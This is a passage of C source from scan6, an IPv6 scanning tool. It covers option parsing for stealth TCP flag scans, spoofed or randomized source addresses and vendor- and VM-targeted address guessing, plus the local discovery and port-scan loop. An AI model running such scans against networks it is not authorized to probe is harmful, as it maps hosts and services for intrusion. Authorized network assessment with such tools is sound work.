atoi(optarg); if(hdrlen <= 8){ puts("Bad length in Hop-by-Hop Options Header"); exit(EXIT_FAILURE); } hdrlen = ((hdrlen+7)/8) * 8; hbhopthdrlen[nhbhopthdr]= hdrlen; if( (hbhopthdr[nhbhopthdr]= malloc(hdrlen)) == NULL){ puts("Not enough memory for Hop-by-Hop Options Header"); exit(EXIT_FAILURE); } ptrhdr= hbhopthdr[nhbhopthdr] + 2; ptrhdrend= hbhopthdr[nhbhopthdr] + hdrlen; while( ptrhdr < ptrhdrend){ if( (ptrhdrend-ptrhdr)>257) pad= 257; else pad= ptrhdrend-ptrhdr; if(!insert_pad_opt(ptrhdr, ptrhdrend, pad)){ puts("Hop-by-Hop Options Header Too Big"); exit(EXIT_FAILURE); } ptrhdr = ptrhdr + pad; } *(hbhopthdr[nhbhopthdr]+1)= (hdrlen/8) - 1; nhbhopthdr++; hbhopthdr_f=TRUE; break; case 'y': /* Fragment header */ nfrags= atoi(optarg); if(nfrags < 8){ puts("Error in Fragmentation option: Fragment Size must be at least 8 bytes"); exit(EXIT_FAILURE); } nfrags = (nfrags +7) & 0xfff8; idata.fragh_f=TRUE; /* XXX: To be removed when fragmentation support is added */ puts("Error: scan6 does not currently support fragmentation"); exit(EXIT_FAILURE); break; case 'S': /* Source Ethernet address */ if(ether_pton(optarg, &(idata.hsrcaddr), sizeof(idata.hsrcaddr)) == 0){ puts("Error in Source link-layer address."); exit(EXIT_FAILURE); } idata.hsrcaddr_f=TRUE; break; case 'D': /* Destination Ethernet address */ if(ether_pton(optarg, &(idata.hdstaddr), sizeof(idata.hdstaddr)) == 0){ puts("Error in Destination Ethernet address."); exit(EXIT_FAILURE); } idata.hdstaddr_f=TRUE; break; case 'L': scan_local_f=TRUE; break; case 'p': /* Probe type */ if(strncmp(optarg, "echo", strlen("echo")) == 0){ probe_echo_f=TRUE; probetype= PROBE_ICMP6_ECHO; probe_f=TRUE; } else if(strncmp(optarg, "unrec", strlen("unrec")) == 0){ probe_unrec_f=TRUE; probetype= PROBE_UNREC_OPT; probe_f=TRUE; } else if(strncmp(optarg, "all", strlen("all")) == 0){ probe_echo_f=TRUE; probe_unrec_f=TRUE; /* For reote scans, we use a single probe type */ probetype= PROBE_ICMP6_ECHO; probe_f=TRUE; } else if(strncmp(optarg, "tcp", strlen("tcp")) == 0){ probetype= PROBE_TCP; probe_f=TRUE; } else{ puts("Error in '-p' option: Unknown probe type"); exit(EXIT_FAILURE); } break; case 'Z': /* Payload Size*/ rhbytes= atoi(optarg); rhbytes_f=TRUE; break; case 'o': /* TCP/UDP Source Port */ srcport= atoi(optarg); srcport_f=TRUE; break; case 'a': /* TCP/UDP Destination Port */ dstport= atoi(optarg); dstport_f=TRUE; break; case 'X': charptr = optarg; while(*charptr){ switch(*charptr){ case 'F': tcpflags= tcpflags | TH_FIN; break; case 'S': tcpflags= tcpflags | TH_SYN; break; case 'R': tcpflags= tcpflags | TH_RST; break; case 'P': tcpflags= tcpflags | TH_PUSH; break; case 'A': tcpflags= tcpflags | TH_ACK; break; case 'U': tcpflags= tcpflags | TH_URG; break; case 'X': /* No TCP flags */ break; default: printf("Unknown TCP flag '%c'\n", *charptr); exit(EXIT_FAILURE); break; } if(*charptr == 'X') break; charptr++; } tcpflags_f=TRUE; break; case 'P': /* Print type */ if(strncmp(optarg, "local", strlen("local")) == 0){ print_local_f=TRUE; print_f=TRUE; } else if(strncmp(optarg, "global", strlen("global")) == 0){ print_global_f=TRUE; print_f=TRUE; } else if(strncmp(optarg, "all", strlen("all")) == 0){ print_local_f=TRUE; print_global_f=TRUE; print_f=TRUE; } else{ puts("Error in '-P' option: Unknown address type"); exit(EXIT_FAILURE); } break; case 'q': print_unique_f=TRUE; break; case 'e': print_type= PRINT_ETHER_ADDR; break; case 't': timestamps_f=TRUE; break; case 'x': idata.local_retrans=atoi(optarg); break; case 'O': idata.local_timeout=atoi(optarg); break; case 'f': rand_src_f=TRUE; break; case 'F': rand_link_src_f=TRUE; break; case 'A': smart_f=TRUE; break; case 'j': if((pref = strtok_r(optarg, ":", &lasts)) == NULL){ printf("Error in prefix option number %u. \n", i); exit(EXIT_FAILURE); } if(strncmp(pref, "udp", 3) == 0 || strncmp(pref, "udp", 3) == 0){ port_list= &udp_port_list; } else if(strncmp(pref, "tcp", 3) == 0 || strncmp(pref, "TCP", 3) == 0){ port_list= &tcp_port_list; } else{ puts("Error unknown protocol in 'port-scan' option"); exit(1); } if(address_contains_ranges(lasts)){ if((pref = strtok_r(NULL, "-", &lasts)) == NULL){ puts("Error in 'port-scan' option"); exit(EXIT_FAILURE); } portscanl= atoi(pref); portscanh= atoi(lasts); } else{ portscanl= atoi(lasts); portscanh= portscanl; } if(portscanl > portscanh){ portscantemp= portscanl; portscanl= portscanh; portscanh= portscantemp; } if(port_list->nport <= port_list->maxport){ if( (port_list->port[port_list->nport] = malloc(sizeof(struct port_entry))) == NULL){ if(idata.verbose_f) puts("scan6: Not enough memory"); exit(EXIT_FAILURE); } port_list->port[port_list->nport]->start= portscanl; port_list->port[port_list->nport]->end= portscanh; (port_list->port[port_list->nport])->cur= (port_list->port[port_list->nport])->start; port_list->nport++; } else{ /* If the number of "prots" has already been exceeded, it doesn't make sense to continue further, since there wouldn't be space for any specific target types */ if(idata.verbose_f) puts("Too many port ranges!"); exit(EXIT_FAILURE); } portscan_f=TRUE; break; case 'G': if(strncmp(optarg, "syn", strlen("syn")) == 0 || strncmp(optarg, "SYN", strlen("SYN")) == 0){ tcpflags= TH_SYN; tcpflags_f=TRUE; } else if(strncmp(optarg, "fin", strlen("fin")) == 0 || strncmp(optarg, "FIN", strlen("FIN")) == 0){ tcpflags= TH_FIN; tcpflags_f=TRUE; } else if(strncmp(optarg, "null", strlen("null")) == 0 || strncmp(optarg, "NULL", strlen("NULL")) == 0){ tcpflags= 0; tcpflags_f=TRUE; } else if(strncmp(optarg, "xmas", strlen("xmas")) == 0 || strncmp(optarg, "XMAS", strlen("XMAS")) == 0){ tcpflags= TH_FIN | TH_PUSH | TH_URG; tcpflags_f=TRUE; } else if(strncmp(optarg, "ack", strlen("ack")) == 0 || strncmp(optarg, "ACK", strlen("ACK")) == 0){ tcpflags= TH_ACK; tcpflags_f=TRUE; } break; case 'V': if(strncmp(optarg, "vbox", strlen("vbox")) == 0){ tgt_vm_f=TRUE; vm_vbox_f=TRUE; } else if(strncmp(optarg, "vmware", strlen("vmware")) == 0){ tgt_vm_f=TRUE; vm_vmware_f=TRUE; } else if(strncmp(optarg, "vmwarem", strlen("vmwarem")) == 0){ tgt_vm_f=TRUE; vm_vmwarem_f=TRUE; } else if(strncmp(optarg, "all", strlen("all")) == 0){ tgt_vm_f=TRUE; vm_vbox_f=TRUE; vm_vmware_f=TRUE; vm_vmwarem_f=TRUE; } else{ puts("Error in '-V' option: Unknown Virtualization Technology"); exit(EXIT_FAILURE); } break; case 'b': tgt_lowbyte_f=TRUE; break; case 'B': if(strncmp("ipv4-all", optarg, MAX_LINE_SIZE) == 0 || strncmp("all", optarg, MAX_LINE_SIZE) == 0){ tgt_ipv4mapped32_f=TRUE; tgt_ipv4mapped64_f=TRUE; } else if(strncmp("ipv4-32", optarg, MAX_LINE_SIZE) == 0 || strncmp("32", optarg, MAX_LINE_SIZE) == 0){ tgt_ipv4mapped32_f=TRUE; } else if(strncmp("ipv4-64", optarg, MAX_LINE_SIZE) == 0 || strncmp("64", optarg, MAX_LINE_SIZE) == 0){ tgt_ipv4mapped64_f=TRUE; } else{ puts("Unknown encoding of IPv4-embedded IPv6 addresses in '-B' option"); exit(EXIT_FAILURE); } break; case 'g': tgt_portembedded_f=TRUE; break; case 'k': /* Target OUI */ /* In case the user entered an OUI as OO:UU:II:00:00:00, just copy the first 8 bytes of input (the OUI part) */ strncpy(oui_ascii, optarg, 8); oui_ascii[8]= 0; strncat(oui_ascii, oui_end, ETHER_ADDR_PLEN-Strnlen(oui_ascii, sizeof(oui_ascii))-1); if(ether_pton(oui_ascii, &oui, sizeof(oui)) == 0){ puts("Error in vendor IEEE OUI"); exit(EXIT_FAILURE); } tgt_oui_f=TRUE; break; case 'K': /* Target vendor */ /* In case the user entered an OUI as OO:UU:II:00:00:00, just copy the first 8 bytes of input (the OUI part) */ strncpy(vendor, optarg, MAX_IEEE_OUIS_LINE_SIZE-1); vendor[MAX_IEEE_OUIS_LINE_SIZE-1]= 0; tgt_vendor_f=TRUE; break; case 'w': /* Target known Interface Identifiers (IIDs) */ strncpy(knowniidsfile, optarg, MAX_FILENAME_SIZE-1); knowniidsfile[MAX_FILENAME_SIZE-1]=0; tgt_knowniidsfile_f=TRUE; break; case 'W': /* Target Interface Identifier (IIDs) */ if(iid_list.nprefix >= iid_list.maxprefix){ puts("Too many INterface Identifiers"); exit(EXIT_FAILURE); } if( (iid_list.prefix[iid_list.nprefix] = malloc(sizeof(struct prefix_entry))) == NULL){ puts("Not enough memory while storing Interface ID"); exit(EXIT_FAILURE); } if ( inet_pton(AF_INET6, optarg, &((iid_list.prefix[iid_list.nprefix])->ip6)) <= 0){ puts("inet_pton(): Source Address not valid"); exit(EXIT_FAILURE); } iid_list.prefix[iid_list.nprefix]->len=128; iid_list.nprefix++; tgt_knowniids_f=TRUE; break; case 'm': /* Known prefixes file */ strncpy(knownprefixesfile, optarg, MAX_FILENAME_SIZE-1); knownprefixesfile[MAX_FILENAME_SIZE-1]=0; knownprefixes_f=TRUE; break; case 'Q': if((charptr = strtok_r(optarg, "/", &lasts)) == NULL){ puts("Error in Source Address"); exit(EXIT_FAILURE); } if(inet_pton(AF_INET, charptr, &(v4host.ip)) != 1){ puts("Error in Host IPv4 Address"); exit(EXIT_FAILURE); } v4hostaddr_f=TRUE; if((charptr = strtok_r(NULL, " ", &lasts)) != NULL){ v4host.len = atoi(charptr); if(v4host.len>32){ puts("Prefix length error in Host IPv4 address"); exit(EXIT_FAILURE); } sanitize_ipv4_prefix(&v4host); v4hostprefix_f=TRUE; } else{ v4host.len=32; } break; case 'T': sort_ouis_f=TRUE; break; case 'N': rnd_probes_f=TRUE; break; case 'I': inc = atoi(optarg); inc_f=TRUE; break; case 'r': if( Strnlen(optarg, LINE_BUFFER_SIZE-1) >= (LINE_BUFFER_SIZE-1)){ puts("scan6: -r option is too long"); exit(EXIT_FAILURE); } sscanf(optarg, "%lu%s", &rate, line); line[LINE_BUFFER_SIZE-1]=0; if(strncmp(line, "pps", 3) == 0) pps_f=TRUE; else if(strncmp(line, "bps", 3) == 0) bps_f=TRUE; else{ puts("scan6: Unknown unit of for the rate limit ('-r' option). Unit should be 'bps' or 'pps'"); exit(EXIT_FAILURE); } break; case 'l': /* "Loop mode */ loop_f=TRUE; break; case 'z': /* Sleep option */ nsleep=atoi(optarg); if(nsleep==0){ puts("Invalid number of seconds in '-z' option"); exit(EXIT_FAILURE); } sleep_f=TRUE; break; case 'v': /* Be verbose */ idata.verbose_f++; break; case 'h': /* Help */ print_help(); exit(EXIT_FAILURE); break; case 'c': /* Configuration file */ strncpy(configfile, optarg, MAX_FILENAME_SIZE-1); configfile[MAX_FILENAME_SIZE-1]=0; configfile_f=TRUE; break; default: usage(); exit(EXIT_FAILURE); break; } /* switch */ } /* while(getopt) */ /* XXX: This is rather ugly, but some local functions need to check for verbosity, and it was not warranted to pass &idata as an argument */ verbose_f= idata.verbose_f; if(geteuid()){ puts("scan6 needs superuser privileges to run"); exit(EXIT_FAILURE); } if(scan_local_f && !idata.iface_f){ puts("Must specify the network interface with the -i option when a local scan is selected"); exit(EXIT_FAILURE); } /* Must open the "Known IIDs" file now, since it might be non-readable for the unprivileged user */ if(tgt_knowniidsfile_f){ if( (knowniids_fp=fopen(knowniidsfile, "r")) == NULL){ perror("Error opening known IIDs file"); exit(EXIT_FAILURE); } } /* Must open the "Known IIDs" file now, since it might be non-readable for the unprivileged user */ if(knownprefixes_f){ if( (knownprefixes_fp=fopen(knownprefixesfile, "r")) == NULL){ perror("Error opening known prefixes file"); exit(EXIT_FAILURE); } dst_f=TRUE; } if(!dst_f && !scan_local_f){ if(idata.verbose_f) puts("Must specify either a destination prefix ('-d'), or a local scan ('-L')"); exit(EXIT_FAILURE); } if(!scan_local_f){ if(load_dst_and_pcap(&idata, LOAD_SRC_NXT_HOP) == FAILURE){ puts("Error while learning Souce Address and Next Hop"); exit(EXIT_FAILURE); } } else{ if(load_dst_and_pcap(&idata, LOAD_PCAP_ONLY) == FAILURE){ puts("Error while learning Souce Address and Next Hop"); exit(EXIT_FAILURE); } } release_privileges(); /* This loads prefixes, but not scan entries */ if(knownprefixes_f){ if(!load_knownprefix_entries(&scan_list, &prefix_list, knownprefixes_fp)){ puts("Couldn't load known IPv6 prefixes"); exit(EXIT_FAILURE); } } if(!inc_f) scan_list.inc=1; if(pps_f && bps_f){ puts("Cannot specify a rate-limit in bps and pps at the same time"); exit(EXIT_FAILURE); } if(pps_f){ if(rate < 1) rate=1; pktinterval= 1000000/rate; } if(bps_f){ switch(probetype){ case PROBE_UNREC_OPT: packetsize= MIN_IPV6_HLEN + sizeof(struct icmp6_hdr) + ICMPV6_ECHO_PAYLOAD_SIZE; break; case PROBE_ICMP6_ECHO: packetsize= MIN_IPV6_HLEN + MIN_DST_OPT_HDR_SIZE + sizeof(struct icmp6_hdr) + ICMPV6_ECHO_PAYLOAD_SIZE; break; case PROBE_TCP: packetsize= MIN_IPV6_HLEN + sizeof(struct tcp_hdr) + rhbytes; break; } if(rate == 0 || ((packetsize * 8)/rate) <= 0) pktinterval= 1000000; else pktinterval= ((packetsize * 8)/rate) * 1000000; } /* We Default to 1000 pps */ if(!pps_f && !bps_f) pktinterval= 1000; if(!configfile_f){ strncpy(configfile, "/etc/ipv6toolkit.conf", MAX_FILENAME_SIZE); } if(tgt_vendor_f || portscan_f){ if(!process_config_file(configfile)){ puts("Error while processing configuration file"); exit(EXIT_FAILURE); } } if(portscan_f){ if(tcp_port_list.nport){ /* Load service names */ if(!load_port_table(tcp_port_table, "tcp", MAX_PORT_ENTRIES)){ puts("Error while loading port number descriptions"); exit(EXIT_FAILURE); } /* LInk service names to port_list structure */ tcp_port_list.port_table= tcp_port_table; /* Initialize port scan results (default to filtered) */ for(i=0; i< MAX_PORT_ENTRIES; i++) tcp_results[i]= PORT_FILTERED; /* We currently support only SYN scans for TCP */ tcpflags_f= TRUE; tcpflags= TH_SYN; } if(udp_port_list.nport){ /* Load service names */ if(!load_port_table(udp_port_table, "udp", MAX_PORT_ENTRIES)){ puts("Error while loading port number descriptions"); exit(EXIT_FAILURE); } /* LInk service names to port_list structure */ udp_port_list.port_table= udp_port_table; /* Initialize port scan results (default to open) */ for(i=0; i< MAX_PORT_ENTRIES; i++) udp_results[i]= PORT_OPEN; } } if(loop_f && !dst_f){ puts("Loop mode '-l' set, but no targets ('-d') specified!"); puts("Note: '-l' option changed since IPv6 toolkit v1.3.4!"); } if(dst_f && !(tgt_ipv4mapped32_f || tgt_ipv4mapped64_f || tgt_lowbyte_f || tgt_oui_f || tgt_vendor_f || \ tgt_vm_f || tgt_range_f || tgt_portembedded_f || tgt_knowniids_f || tgt_knowniidsfile_f)){ tgt_bruteforce_f=TRUE; } if( (tgt_ipv4mapped32_f || tgt_ipv4mapped64_f) && !v4hostaddr_f){ puts("Error: Must IPv4 host address/prefix (with '--ipv4-host') if '--tgt-ipv4-embedded' is set"); exit(EXIT_FAILURE); } if(scan_local_f && (idata.type != DLT_EN10MB || (idata.flags & IFACE_TUNNEL))){ puts("Error cannot apply local scan on a loopback or tunnel interface"); exit(EXIT_FAILURE); } if(!print_f){ print_local_f=TRUE; print_global_f=TRUE; } if(!probe_f){ probe_unrec_f=TRUE; probe_echo_f=TRUE; /* For remote scans we use a single probe type */ probetype=PROBE_ICMP6_ECHO; } /* If a Source Address (and *not* a "source prefix") has been specified, we need to incorporate such address in our iface_data structure. */ if(idata.srcaddr_f && !idata.srcprefix_f){ if(IN6_IS_ADDR_LINKLOCAL(&(idata.srcaddr))){ idata.ip6_local=idata.srcaddr; idata.ip6_local_flag=TRUE; } else{ if( (idata.ip6_global.prefix[idata.ip6_global.nprefix] = malloc(sizeof(struct prefix_entry))) \ == NULL){ if(idata.verbose_f){ puts("Not enough memory while saving global address"); } exit(EXIT_FAILURE); } (idata.ip6_global.prefix[idata.ip6_global.nprefix])->ip6=idata.srcaddr; idata.ip6_global.nprefix++; idata.ip6_global_flag=1; } } if((idata.ip6_local_flag && idata.ip6_global_flag) && !idata.srcaddr_f) localaddr_f=TRUE; if(scan_local_f){ host_local.nhosts=0; host_local.maxhosts= MAX_IPV6_ENTRIES; host_local.host= host_locals; if(probe_echo_f){ if(multi_scan_local(idata.pfd, &idata, &(idata.ip6_local), PROBE_ICMP6_ECHO, ALL_NODES_MULTICAST_ADDR,\ &host_local) == -1){ if(idata.verbose_f) puts("Error while learning link-local addresses with ICMPv6 Echo Requests"); exit(EXIT_FAILURE); } } if(probe_unrec_f){ if(multi_scan_local(idata.pfd, &idata, &(idata.ip6_local), PROBE_UNREC_OPT, ALL_NODES_MULTICAST_ADDR,\ &host_local) == -1){ if(idata.verbose_f) puts("Error while learning link-local addresses with Unrecognized options"); exit(EXIT_FAILURE); } } if(print_local_f){ if(idata.verbose_f) puts("Link-local addresses:"); if(print_unique_f){ if(print_unique_host_entries(&host_local, print_type) == -1){ if(idata.verbose_f) puts("Error while printing global addresses"); exit(EXIT_FAILURE); } } else{ if(print_host_entries(&host_local, print_type) == -1){ if(idata.verbose_f) puts("Error while printing global addresses"); exit(EXIT_FAILURE); } } } if(print_global_f){ host_global.nhosts=0; host_global.maxhosts= MAX_IPV6_ENTRIES; host_global.host= host_globals; if(probe_echo_f){ if(find_local_globals(idata.pfd, &idata, PROBE_ICMP6_ECHO, ALL_NODES_MULTICAST_ADDR,\ &host_global) == -1){ if(idata.verbose_f) puts("Error while learning link-local addresses with ICMPv6 Echo Requests"); exit(EXIT_FAILURE); } } if(probe_unrec_f){ if(find_local_globals(idata.pfd, &idata, PROBE_UNREC_OPT, ALL_NODES_MULTICAST_ADDR,\ &host_global) == -1){ if(idata.verbose_f) puts("Error while learning link-local addresses with Unrecognized options"); exit(EXIT_FAILURE); } } host_candidate.nhosts=0; host_candidate.maxhosts= MAX_IPV6_ENTRIES; host_candidate.host= host_candidates; if(create_candidate_globals(&idata, &host_local, &host_global, &host_candidate) == -1){ if(idata.verbose_f) puts("Error while creating candidate global addresses"); exit(EXIT_FAILURE); } if(validate_host_entries(idata.pfd, &idata, &host_candidate, &host_global) == -1){ if(idata.verbose_f) puts("Error while validating global entries"); exit(EXIT_FAILURE); } if(idata.verbose_f) puts("\nGlobal addresses:"); if(print_unique_f){ if(print_unique_host_entries(&host_global, print_type) == -1){ if(idata.verbose_f) puts("Error while printing global addresses"); exit(EXIT_FAILURE); } } else{ if(print_host_entries(&host_global, print_type) == -1){ if(idata.verbose_f) puts("Error while printing global addresses"); exit(EXIT_FAILURE); } } } } /* Perform a port-scan of a single target */ else if(portscan_f){ puts(SI6_TOOLKIT); puts( "scan6: An advanced IPv6 scanning tool\n"); if(!bps_f && !pps_f){ puts("Rate-limiting probe packets to 1000 pps (override with the '-r' option if necessary)"); } if(idata.verbose_f){ if(tcp_port_list.nport){ printf("Target TCP ports: "); print_port_entries(&tcp_port_list); puts(""); } if(udp_port_list.nport){ printf("Target UDP ports: "); print_port_entries(&udp_port_list); puts(""); } } if(tcp_port_list.nport){ if(udp_port_list.nport){ /* Allow both TCP and UDP packets */ if(pcap_compile(idata.pfd, &pcap_filter, PCAP_TCP_UDP_NSNA_FILTER, PCAP_OPT, PCAP_NETMASK_UNKNOWN) == -1){ if(idata.verbose_f>1) printf("pcap_compile(): %s\n", pcap_geterr(idata.pfd)); exit(EXIT_FAILURE); } } else{ /* Allow only TCP packets */ if(pcap_compile(idata.pfd, &pcap_filter, PCAP_TCP_NSNA_FILTER, PCAP_OPT, PCAP_NETMASK_UNKNOWN) == -1){ if(idata.verbose_f>1) printf("pcap_compile(): %s\n", pcap_geterr(idata.pfd)); exit(EXIT_FAILURE); } } } else{ if(udp_port_list.nport){ /* Allow only UDP packets */ if(pcap_compile(idata.pfd, &pcap_filter, PCAP_UDP_NSNA_FILTER, PCAP_OPT, PCAP_NETMASK_UNKNOWN) == -1){ if(idata.verbose_f>1) printf("pcap_compile(): %s\n", pcap_geterr(idata.pfd)); exit(EXIT_FAILURE); } } /* There is no "else" here, since port scanning is triggered by specifying some proto/port */ } /* Set initial contents of the attack packet */ init_packet_data(&idata); if(pcap_setfilter(idata.pfd, &pcap_filter) == -1){ if(idata.verbose_f>1) printf("pcap_setfilter(): %s\n", pcap_geterr(idata.pfd)); exit(EXIT_FAILURE); } pcap_freecode(&pcap_filter); FD_ZERO(&sset); FD_SET(idata.fd, &sset); if(tcp_port_list.nport){ pscantype= IPPROTO_TCP; port_list= &tcp_port_list; port_results= tcp_results; } else if(udp_port_list.nport){ pscantype= IPPROTO_UDP; port_list= &udp_port_list; port_results= udp_results; } else{ /* Should never happen */ puts("Error: Port scan selected, but no target TCP or UDP ports"); } endpscan_f= FALSE; end_f= FALSE; donesending_f= FALSE; puts("PORT STATE SERVICE"); while(!endpscan_f){ lastprobe.tv_sec= 0; lastprobe.tv_usec=0; idata.pending_write_f=TRUE; while(!end_f){ rset= sset; wset= sset; eset= sset; if(!donesending_f){ timeout.tv_sec= pktinterval / 1000000 ; timeout.tv_usec= pktinterval % 1000000; } else{ #if defined(sun) || defined(__sun) || defined(__linux__) timeout.tv_sec= pktinterval / 1000000 ; timeout.tv_usec= pktinterval % 1000000; #else timeout.tv_usec=0; timeout.tv_sec= PSCAN_TIMEOUT; #endif } /* Check for readability and exceptions. We only check for writeability if there is pending data to send (the pcap descriptor will usually be writeable!). */ if((sel=select(idata.fd+1, &rset, (idata.pending_write_f?&wset:NULL), &eset, &timeout)) == -1){ if(errno == EINTR){ continue; } else{ perror("scan6:"); exit(EXIT_FAILURE); } } if(gettimeofday(&curtime, NULL) == -1){ if(idata.verbose_f) perror("scan6"); exit(EXIT_FAILURE); } /* Check whether we have finished probing all ports */ if(donesending_f){ if(is_time_elapsed(&curtime, &lastprobe, SELECT_TIMEOUT * 1000000)){ end_f=TRUE; } } #if !defined(sun) && !defined(__sun) && !defined(__linux__) /* If we didn't check for writeability in the previous call to select(), we must do it now. Otherwise, we might block when trying to send a packet. */ if(!donesending_f && !idata.pending_write_f){ wset= sset; timeout.tv_usec=0; timeout.tv_sec= 0; if( (sel=select(idata.fd+1, NULL, &wset, NULL, &timeout)) == -1){ if(errno == EINTR){ continue; } else{ perror("scan6:"); exit(EXIT_FAILURE); } } idata.pending_write_f= TRUE; } #endif #if defined(sun) || defined(__sun) || defined(__linux__) if(TRUE){ #else if(sel && FD_ISSET(idata.fd, &rset)){ #endif /* Must rocess incoming packet */ error_f=FALSE; if((result=pcap_next_ex(idata.pfd, &pkthdr, &pktdata)) == -1){ if(idata.verbose_f) printf("Error while reading packet in main loop: pcap_next_ex(): %s", pcap_geterr(idata.pfd)); exit(EXIT_FAILURE); } if(result == 1 && pktdata != NULL){ pkt_ether = (struct ether_header *) pktdata; pkt_ipv6 = (struct ip6_hdr *)((char *) pkt_ether + idata.linkhsize); pkt_end = (unsigned char *) pktdata + pkthdr->caplen; if( (pkt_end - pktdata) < (idata.linkhsize + MIN_IPV6_HLEN)) continue; /* Skip IPv6 EHs if present */ ulhtype= pkt_ipv6->ip6_nxt; pkt_eh= (struct ip6_eh *) ((char *) pkt_ipv6 + sizeof(struct ip6_hdr)); droppacket_f= FALSE; while(ulhtype != IPPROTO_ICMPV6 && ulhtype != IPPROTO_TCP && ulhtype != IPPROTO_UDP && !droppacket_f){ if(ulhtype == IPPROTO_FRAGMENT){ if( ((unsigned char *)pkt_eh + sizeof(struct ip6_frag)) > pkt_end){ droppacket_f= TRUE; break; } fh= (struct ip6_frag *) ((char *) pkt_eh); if(fh->ip6f_offlg & IP6F_OFF_MASK){ droppacket_f= TRUE; break; } ulhtype= fh->ip6f_nxt; pkt_eh = (struct ip6_eh *) ((char *) fh + sizeof(struct ip6_frag)); } else{ if( ((unsigned char *)pkt_eh + sizeof(struct ip6_eh)) > pkt_end){ droppacket_f=TRUE; break; } ulhtype= pkt_eh->eh_nxt; pkt_eh= (struct ip6_eh *) ( (char *) pkt_eh + (pkt_eh->eh_len + 1) * 8); } if( (unsigned char *)pkt_eh >= pkt_end){ droppacket_f= TRUE; break; } } if(droppacket_f){ continue; } pkt_icmp6 = (struct icmp6_hdr *) ((char *) pkt_eh); pkt_tcp= (struct tcp_hdr *) ((char *) pkt_eh); pkt_udp= (struct udp_hdr *) ((char *) pkt_eh); pkt_ns= (struct nd_neighbor_solicit *) ((char *) pkt_eh); if(ulhtype == IPPROTO_ICMPV6){ if( idata.type == DLT_EN10MB && !(idata.flags & IFACE_LOOPBACK) && pkt_icmp6->icmp6_type == ND_NEIGHBOR_SOLICIT){ if( (pkt_end - (unsigned char *) pkt_ns) < sizeof(struct nd_neighbor_solicit)) continue; /* If the addresses that we're using are not actually configured on the local system (i.e., they are "spoofed", we must check whether it is a Neighbor Solicitation for one of our addresses, and respond with a Neighbor Advertisement. Otherwise, the kernel will take care of that. */ if(is_ip6_in_address_list(&(idata.ip6_global), &(pkt_ns->nd_ns_target)) || \ is_eq_in6_addr(&(pkt_ns->nd_ns_target), &(idata.ip6_local))){ if(send_neighbor_advert(&idata, idata.pfd, pktdata) == -1){ if(idata.verbose_f) puts("Error sending Neighbor Advertisement message"); exit(EXIT_FAILURE); } } } else if(pscantype == IPPROTO_UDP && pkt_icmp6->icmp6_type == ICMP6_DST_UNREACH && \ pkt_icmp6->icmp6_code == ICMP6_DST_UNREACH_NOPORT){ /* We are interested in the embedded payload */ pkt_ipv6= (struct ip6_hdr *) ((char *) pkt_icmp6 + sizeof(struct icmp6_hdr)); if( ((unsigned char *)pkt_ipv6 + sizeof(struct ip6_hdr)) > pkt_end) continue; if(!is_eq_in6_addr(&(pkt_ipv6->ip6_dst), &(idata.dstaddr))) continue; ulhtype= pkt_ipv6->ip6_nxt; pkt_eh= (struct ip6_eh *) ((char *) pkt_ipv6 + sizeof(struct ip6_hdr)); droppacket_f= FALSE; while(ulhtype != IPPROTO_ICMPV6 && ulhtype != IPPROTO_TCP && ulhtype != IPPROTO_UDP && !droppacket_f){ if(ulhtype == IPPROTO_FRAGMENT){ if( ((unsigned char *)pkt_eh + sizeof(struct ip6_frag)) > pkt_end){ droppacket_f= TRUE; break; } fh= (struct ip6_frag *) ((char *) pkt_eh); if(fh->ip6f_offlg & IP6F_OFF_MASK){ droppacket_f= TRUE; break; } ulhtype= fh->ip6f_nxt; pkt_eh = (struct ip6_eh *) ((char *) fh + sizeof(struct ip6_frag)); } else{ /* If the EH is smaller than the minimum EH, we drop the packet */ if( ((unsigned char *)pkt_eh + sizeof(struct ip6_eh)) > pkt_end){ droppacket_f=TRUE; break; } ulhtype= pkt_eh->eh_nxt; pkt_eh= (struct ip6_eh *) ( (char *) pkt_eh + (pkt_eh->eh_len + 1) * 8); } if( (unsigned char *)pkt_eh >= pkt_end){ droppacket_f= TRUE; break; } } if(droppacket_f || ulhtype != IPPROTO_UDP){ continue; } pkt_udp= (struct udp_hdr *) ((char *) pkt_eh); port_results[ntohs(pkt_udp->uh_dport)] = PORT_CLOSED; } } /* We only bother to process TCP segments if we are currently sending TCP segments */ else if(pscantype== IPPROTO_TCP && ulhtype == IPPROTO_TCP){ if(!is_eq_in6_addr(&(idata.dstaddr), &(pkt_ipv6->ip6_src))) continue; if(srcport_f){ if(pkt_tcp->th_dport != htons(srcport)) continue; } if(in_chksum(pkt_ipv6, pkt_tcp, pkt_end-((unsigned char *)pkt_tcp), IPPROTO_TCP) != 0) continue; /* Record the port number -- XXX might use the port-setting techniques from path6 */ if(pkt_tcp->th_flags & TH_RST){ port_results[ntohs(pkt_tcp->th_sport)] = PORT_CLOSED; } else if(pkt_tcp->th_flags & TH_SYN){ port_results[ntohs(pkt_tcp->th_sport)] = PORT_OPEN; } } } } if(!donesending_f && !idata.pending_write_f && is_time_elapsed(&curtime, &lastprobe, pktinterval)){ idata.pending_write_f=TRUE; continue; } #if defined(sun) || defined(__sun) || defined(__linux__) if(!donesending_f && idata.pending_write_f){ #else if(!donesending_f && idata.pending_write_f && FD_ISSET(idata.fd, &wset)){ #endif idata.pending_write_f=FALSE; /* Check whether the current scan_entry is within range. Otherwise, get the next target */ if( !is_port_in_range(port_list)){ if(!get_next_port(port_list)){ if(gettimeofday(&lastprobe, NULL) == -1){ if(idata.verbose_f) perror("scan6"); exit(EXIT_FAILURE); } donesending_f=TRUE; continue; } } if(!send_pscan_probe(&idata, port_list, &(idata.srcaddr), pscantype)){ exit(EXIT_FAILURE); } if(gettimeofday(&lastprobe, NULL) == -1){ if(idata.verbose_f) perror("scan6"); exit(EXIT_FAILURE); } if(!get_next_port(port_list)){ donesending_f=TRUE; continue; } } if(FD_ISSET(idata.fd, &eset)){ if(idata.verbose_f) puts("scan6: Found exception on libpcap descriptor"); exit(EXIT_FAILURE); } } if(pscantype== IPPROTO_TCP){ /* Result types can be PORT_OPEN, PORT_CLOSED, and PORT_FILTERED */ print_port_scan(port_list, port_results, PORT_OPEN); } else{ print_port_scan(port_list, port_results, PORT_OPEN); } /* We always start with TCP scans (if there are any target ports) */ if(pscantype== IPPROTO_TCP){ if(udp_port_list.nport){ pscantype= IPPROTO_UDP; port_list= &udp_port_list; port_results= udp_results; } else{ endpscan_f= TRUE; } } else{ endpscan_f= TRUE; } } exit(EXIT_SUCCESS); } /* Remote scan */ else{ /* Smart entries are the first ones to be included */ if(smart_list.ntarget){ if(!load_smart_entries(&scan_list, &smart_list)){ puts("Couldn't load smart 